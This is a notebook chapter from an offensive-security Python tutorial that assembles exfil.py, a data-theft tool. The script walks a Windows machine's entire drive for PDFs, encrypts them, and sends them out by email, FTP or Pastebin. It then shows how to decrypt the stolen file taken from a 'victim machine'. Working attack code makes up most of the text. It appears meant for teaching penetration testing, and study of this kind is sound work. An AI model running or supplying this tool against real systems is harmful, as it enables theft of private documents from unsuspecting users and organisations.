<a href="https://colab.research.google.com/github/damianiRiccardo90/BHP/blob/master/C9-Fun_With_Exfiltration/Putting_It_All_Together.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>

### *__Putting It All Together__*

Finally, we tie our exfiltration methods together with __exfil.py__, which we can call to exfiltrate files by using any of the methods we've just written:

In [ ]:
from cryptor import encrypt, decrypt #[1]
from email_exfil import outlook, plain_email
from transmit_exfil import plain_ftp, transmit
from paste_exfil import ie_paste, plain_paste

import os

EXFIL = { #[2]
    'outlook': outlook,
    'plain_email': plain_email,
    'plain_ftp': plain_ftp,
    'transmit': transmit,
    'ie_paste': ie_paste,
    'plain_paste': plain_paste
}

First, import the modules and functions you just wrote __[1]__. Then, create a dictionary called __EXFIL__ whose values correspond to the imported functions __[2]__. This will make calling the different exfiltration functions very easy. The values are the names of the functions, because, in Python, functions are first-class citizens and can be used as parameters. This technique is sometimes called __dictionary_dispatch__. It works much like a case statement in other languages.

Now we need to create a function that will find the documents we want to exfiltrate:

In [ ]:
def find_docs(doc_type='.pdf'):
    for parent, _, filenames in os.walk('c:\\'): #[2]
        for filename in filenames:
            if filename.endswith(doc_type):
                document_path = os.path.join(parent, filename)
                yield document_path #[2]

The __find_docs__ generator walks the entire filesystem checking for PDF documents __[1]__. When it finds one, it returns the full path and yields back execution to the caller __[2]__.

Next, we create the main function to orchestrate the exfiltration:

In [ ]:
def exfiltrate(document_path, method): #[1]
    if method in ['transmit', 'plain_ftp']: #[2]
        filename = f'c:\\windws\\temp\\{os.path.basename(document_path)}'
        with open(document_path, 'rb') as f0:
            contents  = f0.read()
        with open(filename, 'wb') as f1:
            f1.write(encrypt(contents))

        EXFIL[method](filename) #[3]
        os.unlink(filename)
    else:
        with open(document_path, 'rb') as f: #[4]
            contents = f.read()
        title = os.path.basename(document_path)
        contents = encrypt(contents)
        EXFIL[method](title, contents) #[5]

We pass the __exfiltrate__ function the path to a document and the method of exfiltration we want to use __[1]__. When the method involves a file transfer (__transmit__ or __plain_ftp__), we need to provide an actual file, not an encoded string. In that case, we read in the file from its source, encrypt the contents, and write a new file into a temporary directory __[2]__. We call the __EXFIL__ dictionary to dispatch the corresponding method, passing in the new encrypted document path to exfiltrate the file __[3]__ and then remove the file from the temporary directory.

For the other methods, we don't need to write a new file; instead, we need only to read the file to be exfiltrated __[4]__, encrypt its contents, and call the __EXFIL__ dictionary to email or paste the encrypted information __[5]__.

In the main block, we iterate over all of the found documents. As a test, we exfiltrate them via the __plain_paste__ method, although you can choose any of the six functions we defined:

In [ ]:
if __name__ == '__main__':
    for fpath in find_docs():
        exfiltrate(fpath, 'plain_paste')

### *__Kicking the Tires__*

There are a lot of moving parts to this code, but the tool is quite east to use.
Simply run your __exfil.py__ script from a host and wait for it to indicate that it has successfully exfiltrated files via email, FTP, or Pastebin.

If you left Internet Explorer visible while running the __paste_exfile.ie__ ____paste__ function, you should have been able to watch the whole process.

After it's complete, you should be able to browse to your Pastebin page and see something like __Figure 9-1__.

<div align="center" width="100%">
<img src="https://github.com/damianiRiccardo90/BHP/blob/master/C9-Fun_With_Exfiltration/Exfiltrated_And_Encrypted_Data_On_Pastebin.png?raw=true" alt="Starting A Live Passive Scan With Burp" width="70%">
<p style="text-align:center"><em>Figure 9-1: Exfiltrated and encrypted data on Pastebin</em></p>
</div>

Perfect! Our __exfil.py__ script picked up a PDF document called __topo_post.pdf__, encrypted the contents, and uploaded the contents to __pastebin.com__. We can successfully decrypt the file by downloading the paste and feeding it to the decryption function, as follows:

In [ ]:
from cryptor import decrypt

with open('topo_post_pdf.txt', 'rb') as f: #[1]
    contents = f.read()
with open('newtopo.pdf', 'wb') as f:
    f.write(decrypt(contents)) #[2]

This snippet of code opens the downloaded paste file __[1]__, decrypts the contents, and writes the decrypted contents as a new file __[2]__. You can then open the new file with a PDF reader to view the topographic map that contains the original, decrypted map from the victim machine.

You now have several tools for exfiltration in your toolbox. Which one you select will depend on the nature of your victim's network and the level of security used on that network.